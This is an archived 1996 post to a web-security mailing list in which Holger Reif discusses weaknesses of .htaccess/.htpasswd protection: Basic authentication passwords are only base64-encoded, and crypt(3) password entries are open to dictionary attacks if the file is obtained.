[3097] in WWW Security List Archive
Re: Any known holes in .htaccess/.htpasswd directory security?
daemon@ATHENA.MIT.EDU (Holger Reif)
Thu Sep 26 16:49:33 1996
Date: Thu, 26 Sep 96 20:51:53 +0200
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif)
To: www-security@ns2.rutgers.edu, Steff.Watkins@Bristol.ac.uk,
JOHNAL@attachmate.com
Errors-To: owner-www-security@ns2.rutgers.edu
Steff Watkins:
> "In Basic HTTP Authentication, the password is passed over the network not
> encrypted but not as plain text -- it is "uuencoded."
To be exactly: base64 encoded.
> Anyone watching
> packet traffic on the network will not see the password in the clear, but
> the password will be easily decoded by anyone who happens to catch the
> right network packet."
> However, this still does NOT negate that fact that a user, intent on
> entry, may be able to pull the htpasswd file and then use 'crack' on it
> instead!!!
Right. The entries are encrypted using the crypt(3) routine and therefore
vulnerable to dictinary attacks.
John Allen:
> Eh? I created my .htpasswd file by cut and pasting my encrypted password
> from /etc/passwd ??!! And that file works just fine on my NCSA web
> server on my desk here at work??!! What system are you using?
Not nessecarily a good idea but if you use that password for unprotected telnet
over some network too than you don't increase you risk of getting sniffed.
read you later - Holger Reif
---------------------------------------- Signaturprojekt Deutsche Einheit
TU Ilmenau - Informatik - Telematik (Verdamp lang her)
Holger.Reif@PrakInf.TU-Ilmenau.DE Alt wie ein Baum werden, um ueber
http://Remus.PrakInf.TU-Ilmenau.DE/Reif/ alle 7 Bruecken gehen zu koennen
